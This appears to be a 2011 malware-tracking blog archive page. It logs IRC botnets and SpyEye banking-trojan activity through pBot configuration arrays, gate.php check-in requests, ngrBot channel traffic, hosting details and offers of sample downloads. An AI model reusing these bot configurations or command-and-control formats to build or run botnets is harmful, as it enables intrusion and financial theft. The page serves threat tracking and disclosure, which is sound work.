Month: June 2011

bots hosted in Korea, Republic Of Ulsan Dacom Corp

var $config = array(
    "server"   => "",
    "port"     => "9999",
    "pass"     => "",
    "prefix"   => "syik",
    "maxrand"  => "4",
    "chan"     => "#setoran",
    "chan2"    => "#setoran",
    "key"      => "setoran",
    "modes"    => "+p",
    "password" => "setoran",
    "trigger"  => ".",
    "hostauth" => "racrew"
);

hosting infos:

21mb malware samples

A lot of SpyEye variants and other banking trojans, IRC bots, worms etc. Download:

bfbot creator reborn? iserdo using SpyEye hosted in Netherlands Amsterdam Snel Internet Services B.v

Spy Eye Panel:
Spy Eye Sample: (just in case first link is removed)
Websites used to infect people: ??? iserdo need money? ???? lol

HTTP Queries:
GET /kurac/gate.php?guid=User!SANDBOXB!38BA2BE7&ver=10299&stat=ONLINE&ie=6.0.2900.2180&os=5.1.2600&ut=Admin&cpu=100&ccrc=FADB319B&md5=e47f5cbd0ae6d17cbeb5530db3f9779f HTTP/1.1

Eye Banking Trojan hosted in Viet Nam Layer 2 -customer Network Of Vtdc

ishigo is a poor French lamer; he's known in carding boards. Exe File: Avira fails to detect this:

File name: ptcmd.exe   Result: FALSE POSITIVE
The file 'ptcmd.exe' has been classified as 'FALSE POSITIVE'. This means that this file is not dangerous and that it was an erroneous report on our part. The detection pattern

HTTP malware

DNS Queries:
IN A
IN A
IN A

HTTP Queries:
POST /files/filtect.php HTTP/1.0
POST /apuracao/filtect.php HTTP/1.0
POST /memo/filtect.php HTTP/1.0

DNS Queries:
IN A
IN A
IN A
IN A

hosted in Russian Federation Oao Webalta

Remote Host / Port Number: 80, 80, 80, 7654

PASS ngrBot
NICK n{US|XPa}sxwscly
USER sxwscly 0 0 :sxwscly
JOIN #oldgold noKIDs
PRIVMSG #oldgold :[d="" s="167936 bytes"] Updated bot file "C:\Documents and Settings\UserName\Application Data\Wcxaxw.exe" - Download retries: 0
PRIVMSG #oldgold :[DNS]: Blocked 0 domain(s) - Redirected 31 domain(s)

hosting infos:

linux bots hosted in United States Limestone Networks Inc

class pBot {
    var $config = array(
        "server"   => "",
        "port"     => "2390",
        "pass"     => "",
        "prefix"   => "BoT",
        "maxrand"  => "3",
        "chan"     => "#dada",
        "chan2"    => "#dada",
        "key"      => "123456",
        "modes"    => "+p",
        "password" => "123",
        "trigger"  => ".",
        "hostauth" => "*"   // * for any hostname (remember: /setvhost)
    );
}

Clients: I have 162 clients and 0 servers
Local users: Current Local Users: 162 Max: 585
Global users: Current Global Users: 162 Max: 477
Joins: [A]BoT824 12[]